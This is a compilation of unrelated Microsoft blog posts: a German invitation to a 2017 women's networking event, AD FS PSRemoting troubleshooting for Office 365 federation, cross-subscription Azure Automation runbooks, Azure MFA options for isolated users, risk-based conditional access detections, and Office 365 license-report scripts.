Unsere Antwort auf diese Frage ist ein ganz klares und lautes: Ja! Aus diesem Grund hat Microsoft auch die Initiative „Women Think Next“ ins Leben gerufen. Sie bietet weiblichen Senior Professionals verschiedener Branchen die Möglichkeit, auf regelmäßigen, weltweit stattfindenden Netzwerkveranstaltungen Erfahrungen auszutauschen, andere tolle und inspirierende Frauen kennenzulernen und vor allem neue Kontakte zu knüpfen.

Dabei glauben wir an die Kraft von Netzwerken und Vorbildern und möchten Euch herzlich dazu einladen, gemeinsam mit uns unter dem Themendach #worklifeflow über die Veränderungen der Arbeitswelt zu diskutieren: Welche neuen Anforderungen ergeben sich aus dem technologischen und kulturellen Wandel für Organisationen, Mitarbeiter und Führungskräfte? Welche Chancen und Herausforderungen bietet die Digitalisierung gerade für Frauen in der Arbeitswelt?

Wann? 30. Mai 2017, ab 18 Uhr
Wo? Microsoft Deutschland, Walter-Gropius-Str. 5, München-Schwabing

Die Sprecherinnen auf dem Event sind u.a.:

• Inga Höltmann, Gründerin und New-Work Journalistin
• Tijen Onaran, Gründerin des Women in Digital e.V.,
• Anna Süster Volquardsen, Gründerin des Online Magazins DEAR WORK,
• Anna Kopp, Chief Information Officer bei Microsoft Deutschland,
• Claudia Wentsch, Director Human Resources bei Microsoft Deutschland, und
• Masa Matejic, Team Lead Business Solutions bei Microsoft Deutschland

Das Programm in der Übersicht:

18:00 Uhr Einlass
18:30 Uhr Eröffnung durch Dr. Christine Haupt, General Manager Services & Diversity Champion, und Markus Köhler, Senior Director HR, Microsoft Deutschland
18:40 Uhr Keynote von Inga Höltmann mit anschließendem Q&A
19:30 Uhr Snacks, Getränke & Networking
20:00 Uhr Breakout-Sessions zu den Themen

• Digital Leadership
• Networking
• Digital Workstyle
• Growth Mindset

Ab 21 Uhr Networking

Parallel habt ihr auch die Möglichkeit, im Rahmen einer Führung unser Smart Workspace-Konzept  in der neuen Deutschland-Zentrale von Microsoft kennenzulernen oder Zukunftstechnologien wie die Microsoft HoloLens, das Surface Studio und weitere Innovationen vor Ort selbst zu testen

Ihr möchtet teilnehmen? Hier geht’s zur Anmeldung. Wir freuen uns auf Euch!

Ein Beitrag von Maren Michaelis
 Communications Manager Employer Branding

When configuring AD FS for Office 365, one of the final steps is to link Azure AD with the on-premises AD FS deployment.  This should occur only after AD FS and WAP servers have been fully deployed, verified and tested.

When linking the AD FS infrastructure with Office 365, we must use the Azure AD PowerShell module.  We need to point the module at the primary AD FS server using the Set-MsolADFSContext cmdlet, if the module is not executed locally on the primary AD FS server.

If everything just works, then there would be no need for this blog post and life would be far less interesting.  One of the requirements is that the AD FS server has PSRemoting enabled.  If PSRemoting is not enabled, a firewall blocks it or the WinRM service is not running you will not be able to complete the required configuration.

The below screenshots illustrate the observed behaviour if we run into PSRemoting issues.

Note that the AD FS servers require Internet access on TCP 80 and 443 to connect to Azure AD and complete the configuration.  TCP 80 is required for Certificate Revocation List checks and TCP 443 is for the actual service communication.

Lab Configuration

In this lab we have AD FS 2016 deployed.  All of these machines are part of the same AD Domain in the same forest.  We are logged on as a domain admin account so we do not have to worry about security assignment issues in this post.  We can focus on the PSRemoting aspect.

On the primary AD FS server, the WinRM service was deliberately stopped.  This is shown in the PowerShell window below.

To prove that the server is not listening on the regular PSRemoting ports, we check using netstat.  Note that no services are listening on TCP 5985 or TCP 5986.

Authentication Prompt Due to PSRemoting Denied

What happens if we now go to a remote machine and try to point the Azure AD module to this AD FS server using the Set-MsolADFSContext cmdlet.  In the below example note that the server name is the same hostname which was displayed above: ADFS-2016-1.wingtiptoys.ca.

[code language=”PowerShell” light=”true”]Set-MsolADFSContext –Computer ADFS-2016-1.wingtiptoys.ca[/code]

Oh – that did not end well.  We got an authentication prompt.  How come?  We are logged on as a domain administrator account, and you can see that the PowerShell instance is running as administrator.

Even if you correctly enter the credentials into the prompt, the command still fails.  This is most likely due to PowerShell remoting NOT being enabled on the server that the –Computer parameter specifies.  In our case the server: ADFS-2016-1.wingtiptoys.ca.

To troubleshoot the issue, we can review the Azure AD Module’s log file.  This is located in:

%USERPROFILE%DocumentsMicrosoftOnline

The below is an excerpt from the log file.  The highlighted line indicates that we are unable to connect to the primary AD FS server on TCP 5985.

5/14/2017 4:05:26 PM    Runspace Connection info: Scheme:http Port:5985, AuthenticationType:Default Uri:ADFS-2016-1.wingtiptoys.ca AppName:wsman, Shell:http://schemas.microsoft.com/powershell/Microsoft.PowerShell
5/14/2017 4:05:26 PM    Connection Uri: http://ADFS-2016-1.wingtiptoys.ca:5985/wsman/
5/14/2017 4:05:26 PM    Opening runspace to ‘http://adfs-2016-1.wingtiptoys.ca:5985/wsman/’
5/14/2017 4:05:47 PM    System.Management.Automation.Remoting.PSRemotingTransportException: Connecting to remote server adfs-2016-1.wingtiptoys.ca failed with the following error message : WinRM cannot complete the operation. Verify that the specified computer name is valid, that the computer is accessible over the network, and that a firewall exception for the WinRM service is enabled and allows access from this computer. By default, the WinRM firewall exception for public profiles limits access to remote computers within the same local subnet. For more information, see the about_Remote_Troubleshooting Help topic.
at System.Management.Automation.Runspaces.AsyncResult.EndInvoke()
at System.Management.Automation.Runspaces.Internal.RunspacePoolInternal.EndOpen(IAsyncResult asyncResult)
at Microsoft.Online.Identity.Federation.Powershell.PowerShellSession.VerifyAndReconnectRunSpacePool()

Authentication Prompt Due to Incorrect AD FS Server Name

Another cause for unexpected authentication prompts when using the Set-MsolADFSContext cmdlet is a typo in the specified AD FS server name.

Note that the WinRM service is running on the primary AD FS server.  The server’s FQDN is also displayed: ADFS-2016-1  – note though that in the below command an incorrect name will be used.

The “AD” in the server name was transposed.  This is to demonstrate what will happen if the wrong name is used.

[code language=”PowerShell” light=”true”]Set-MsolADFSContext –Computer AFDS-20161.wingtiptoys.ca[/code]

 Note that the big red arrow indicates that the authentication request specifies the wrong server name AFDS-2016-1.  The characters are transposed.

Enabling or Disabling PSRemoting Access Denied

In current versions of Windows we have the Disable-PSRemoting and Enable-PSRemoting cmdlets.  On one AD FS 2016 lab system, I was not able to run these commands.  They would both generate an access denied error.

For the search engines:

Disable-PSRemoting -Force
WARNING: Disabling the session configurations does not undo all the changes made by the Enable-PSRemoting or
Enable-PSSessionConfiguration cmdlet. You might have to manually undo the changes by following these steps:
1. Stop and disable the WinRM service.
2. Delete the listener that accepts requests on any IP address.
3. Disable the firewall exceptions for WS-Management communications.
4. Restore the value of the LocalAccountTokenFilterPolicy to 0, which restricts remote access to members of the
Administrators group on the computer.
remove-item : Access is denied.
At line:69 char:21
+ …                   remove-item -path “$securityIDPath” -recurse -force
+                       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo          : NotSpecified: (:) [Remove-Item], InvalidOperationException
+ FullyQualifiedErrorId : System.InvalidOperationException,Microsoft.PowerShell.Commands.RemoveItemCommand

new-item : Access is denied.
At line:74 char:21
+                     new-item -path “$securityPath” -Sddl $sddl -force
+                     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo          : NotSpecified: (:) [New-Item], InvalidOperationException
+ FullyQualifiedErrorId : System.InvalidOperationException,Microsoft.PowerShell.Commands.NewItemCommand

PS C:>
PS C:> Enable-PSRemoting -Force
remove-item : Access is denied.
At line:69 char:21
+ …                   remove-item -path “$securityIDPath” -recurse -force
+                       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo          : NotSpecified: (:) [Remove-Item], InvalidOperationException
+ FullyQualifiedErrorId : System.InvalidOperationException,Microsoft.PowerShell.Commands.RemoveItemCommand

Looking at access denied errors in Sysinternal’s Process Monitor we can see that there were issues writing to the registry.

Specifically this was under the key:

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionWSMANPluginMicrosoft.Windows.Internal.ADFS

PSRemoting should be enabled by  default on current Windows builds.  This should be verified prior to installing AD FS.

Cheers,

Rhoderick

Azure Automation is very useful for almost every Azure administrator, but it can be challenging to figure out how to run a process across multiple subscriptions. Below we’ll walk through the steps to run a PowerShell run book across multiple subscriptions with the assumption that the automation account already exists in one subscription. For information on how to create an automation account, see here . The other assumption is that we are working with Resource Manager, not Classic deployments.

Once we have our automation account the high level steps are as follows:
1. Find the ApplicationID of the RunAS connection
2. Grant that applicationID the appropriate permissions in the other subscriptions (in my example, I’m giving it subscription level contributor access).
3. Set the appropriate context during runbook execution.

When an Azure Automation account is created it asks if “RunAS” account should be created and defaults to ‘yes’. If you keep the defaults, you’ll have a connection asset in the automation account called “AzureRunAsConnection”. This connection asset is really a Service Principal in Azure AD.

Copy the “ApplicationID” of the AzureRunAsConnection to the clipboard and grant it rights to any subscriptions you want to manage with your central automation account. In this example, I’ve given it contributor rights at the subscription level, but you could certainly use more granular permissions here or scope it to a specific resource group.

Now I just need to write my runbooks in such a way that they’ll use the connection asset and select the appropriate subscription. The following code sample runs from a subscription called ‘sub1’ and creates a new resource group in subscription name ‘sub2’. You’ll need to update the certificate thumbprint in this script by retrieving it from the Assets–>Certificates blade in the automation account.

 $Conn = Get-AutomationConnection -Name AzureRunAsConnection
add-AzureRmAccount -ServicePrincipal -Tenant $Conn.TenantID -ApplicationId $Conn.ApplicationID -CertificateThumbprint #yourthumbprint
$sub = Get-AzureRmSubscription
Select-AzureRmSubscription -SubscriptionName 'sub2'
$rg = 'testrg'
New-AzureRmResourceGroup -Name $rg -Location westus2

Your password probably starts with a capital letter and ends with either a number or exclamation mark.  You probably reuse passwords across multiple sites, many of have been compromised.  Due to the weakness of traditional user names and passwords, Multi Factor Authentication has exploded in popularity over the past several years as customers look to reduce their exposure.

Deploying Azure MFA is usually very straight forward.  If you don’t want user’s to receive text messages, that’s fine.  The MFA admin selects which methods of communication are allowed and during registration, the user selects the preferred option from the list.  Most users have access to broadband or Wi-Fi and can answer the second factor of authentication with the appropriate response.

But what if they cant?  What if your user is in an isolated environment though and cannot be reached?  What are some options to authenticate these cowboys?

The blog introduces 3 options for addressing this scenario. We can accommodate the isolated user with a “Time-Based One-Time Password” (TOTP) solution.  Codes are generated locally by combining a secret key with the current timestamp using a cryptographic hash function to generate a one-time password.  The user enters these codes as a second factor of authentication and life is good.

The easiest solution for the isolated user is to deploy the Microsoft Authenticator application. The Microsoft Authenticator app can receive notifications both over cellular and Wi-Fi connections. In addition, the application can generate access codes locally. These codes don’t require internet or data, so you don’t have to worry about having phone service to sign in, or that the app will use up your data plan. When you close the app, it doesn’t keep running in the background so it won’t drain your battery. You can close the app and ignore it until the next time that you sign in.

The Microsoft Authenticator app works across all platforms and accomplishes the goal of allowing the user to enter the current code into the verification window in an isolated environment.

The second solution involves deploying an on-prem Azure Multi-Factor Authentication Server.  This solution ties into our Azure MFA service to provide MFA auth to a subset on-prem resources, specifically ADFS, RADIUS, and IIS.  This process involves importing third-party Open Authentication (OATH) time-based, one-time password (TOTP) tokens, and then using them for two-step verification. For example, a customer could utilize ActiveIdentity tokens  which are OATH TOTP tokens whose secret key was imported into the Azure Multi-Factor Authentication Server.

OATH TOTP tokens support the following formats:

Portable Symmetric Key Container (PSKC) CSV if the file contains a serial number, a secret key in Base 32 format, and a time interval

Lastly, third party MFA solutions and their various flavors of OTP could be leveraged from within ADFS.  Once installed and registered with ADFS, it is possible to enforce MFA as part of the global or per-relying-party authentication policy.  These solutions are all supported with ADFS.

This post is the third of a three-part series detailing Conditional Access from Microsoft Enterprise Mobility + Security. Today we are re-publishing the third installment with the white paper Protect your data at the front door with conditional access.

Through this blog series, we’ve taken a closer look at conditional access with Enterprise Mobility + Security and the innovations that can help you define and inform your policies with different layers of controls for user/location, applications, and devices. Most of the scenarios we’ve discussed have addressed user-based vulnerabilities, but it’s important to take into consideration the broader threat landscape and its complex risks.

Risk-based conditional access

Although attacks are increasingly sophisticated, each one leaves revealing traces, a calling card. This data can be used to find patterns that will help us protect against attacks. But processing such tremendous volume is no small task—so we got to work. Every month we update more than 1 billion PCs, service more than 450 billion authentications, and analyze more than 200 billion emails for malware and malicious websites. We see just about every kind of attack there is, and we push the data directly into our Microsoft Intelligent Security Graph.

The graph pulls together all of the telemetry and signals that come in from the hundreds of cloud services operated by Microsoft, extensive and ongoing research, and data from partnerships with industry leaders and law enforcement organizations. This graph is unique to Microsoft. We apply our machine learning and data analytics to identify suspicious and anomalous activities that characterize modern sophisticated attacks. The graph makes it possible for us to deliver recommendations and automated actions that protect, detect, and respond across different attack vectors.

You can use the Microsoft Intelligence Graph to inform your conditional access policies to protect against risk events by blocking access when risk is detected.

Leaked credentials

Microsoft security researchers search for credentials that have been posted on the dark web, which usually appear in plain text. Machine learning algorithms compare these credentials with Azure Active Directory credentials and report any match as “leaked credentials.”

Impossible travel or atypical locations

Machine intelligence detects when two sign-ins originate from different geographic locations within a window of time too short to accommodate travel from one to the other. This is a pretty good indicator that a bad actor succeeded in logging on.

Machine intelligence also flags sign-ins at atypical locations by comparing them against past sign-ins of every user. Sign-ins from familiar devices or sign-ins from or near familiar locations will pass.

Sign-ins from potentially infected devices

The Microsoft Intelligent Security Graph maintains a list of IP addresses known to have been in contact with a bot server. Devices that attempt to contact resources from these IP addresses are possibly infected with malware and are therefore flagged.

Sign-ins from anonymous IP addresses

People who want to hide their device’s IP address, often with malicious intent, frequently use anonymous proxy IP addresses. A successful sign-in from an anonymous IP address is flagged as a risky event. If the risk score is medium, a risk-based conditional access policy can require MFA as additional proof of identity.

Sign-ins from IP addresses with suspicious activity

Multiple failed sign-in attempts that occur over a short period of time, across multiple user accounts, and that originate from a single IP address, also trigger a risk event. Traffic patterns that match those of IP addresses used by attackers are a strong indication that accounts are either already compromised or will be very soon, although the traffic pattern may also originate from an IP address shared with multiple devices via a router or similar device.

Beyond access control

Microsoft Enterprise Mobility + Security (EMS) delivers innovative security technologies that provide a holistic, identity-driven approach to mobility, identity, and security in a mobile-first, cloud-first world.

While our risk-based conditional access helps protect your data “at the front door,” EMS also gives you visibility into user, device, and data activity on-premises and in the cloud, and includes solutions that allow you to protect your corporate data from user mistakes with stronger controls and enforcement.

To get a full picture of conditional access from EMS, download our white paper today.

I have often come across this requirement where I am asked for a custom report that returns the following.

1. A division of licenses based on domains
   
2. Types of licenses assigned
   

Fortunately, we have Microsoft Excel that can do much of the filtering – if we can export a list of all the details required above. And so, I wrote two PowerShell scripts.

Please find them at the end of this article.

Note: This script has been designed for information retrieval and does not change anything on Office 365. Also, it is not covered under Microsoft support – please treat this as a sample.

Outputs

Script – Version 1

Script Version 1 Output:

This script will find the desktop and post a comma-delimited CSV file. This file can be opened in the notepad. However, to make better sense, you can open it in MS Excel and then press “Ctrl + T” (and select “My table has headers”), to format the output as a table.

Once converted to a table, you can click on the small drop-down (down-arrow) buttons next to each column-head to filter the table as you need.

References on dealing with CSV data in Excel

1. Formatting as a table
   
2. Filtering data in a table
   

    

Columns in the output CSV:

1. Display Name
   
2. User Principal Name
   
3. Each SKU or License-type (in the tenant) has a column in the CSV
   

    

Below is a sample.

Script Version 1 Time Taken:

This script returns value of the time taken. Below are some test numbers on time taken to connect to office 365, retrieve data, analyze and export to a csv file.

8000 users – 2 minutes 13 seconds

20000 users – 6 minutes 28 seconds

This looks like an acceptable time investment considering the once-in-a-month-type nature of the report.

However, the time taken increases with increasing user base and slower connection and is dependent on the client system configuration.

Script – Version 2

Script Version 2 Output:

This script will find the desktop and post multiple comma-delimited CSV files.

(You can format and filter these CSVs as tables – as explained above in output description of script-version-1.)

Columns in the first CSV:

1. Display Name
   
2. User Principal Name
   
3. Each SKU or License-type (in the tenant) has a column in the CSV
   

Columns in the second CSV:

1. Display Name
   
2. User Principal Name
   
3. Each Office 365 Service (in the tenant) has a column in the CSV
   

    

Below is a sample from the second CSV

Script Version 2 Time Taken:

The script returns the value of time taken.

8000 users – 2 minutes 31 seconds

20000 users – 6 minutes 48 seconds

Steps to Run

Step 1:

Only for the first run: Prepare PowerShell to run Office 365 related scripts.

• Open Windows PowerShell as an administrator
  
• Run the command: Set-ExecutionPolicy RemoteSigned -Scope CurrentUser
  
• Confirm “Yes” or “Yes to All” when prompted.
  
• Close PowerShell Window.
  

Step 2:

Only for the first run: Download and install the necessary PowerShell modules.

• Microsoft Online Services Sign-In Assistant for IT Professionals RTW and
  
• Azure Active Directory Module for PowerShell
  

  32 bit
  

  64 bit
  

Step 3:

Only for the first run:
Ready the script

• Copy the script on to notepad.
  
• Save the file as a “.ps1” file on the desktop.
  

Step 4:

Running the script – There are two options.

1. Action Item: Starting the script
   

   Option 1: Right click on the .ps1 file and click on “Run with PowerShell”
   

   Option 2: Open Windows PowerShell > Type in the path of the file at the prompt – (e.g. “c:usersanshumanscript.ps1”) > hit Enter key.
   

2. Action Item: The script will prompt for credentials. Please enter your Office 365 Global Administrator credentials.
   
3. Wait & Watch: The script will then keep you waiting as it starts to connect and retrieve users.
   

   
   

    

4. Wait & Watch: It will then start reading into each user’s licensing information. And while it does that, you will see a progress bar.
   

   
   

5. Wait & Watch: Once, the processing is over, this script is going to write the licensing information on to a CSV file – and post it on your desktop.
   

Script Version 1

Script Version 2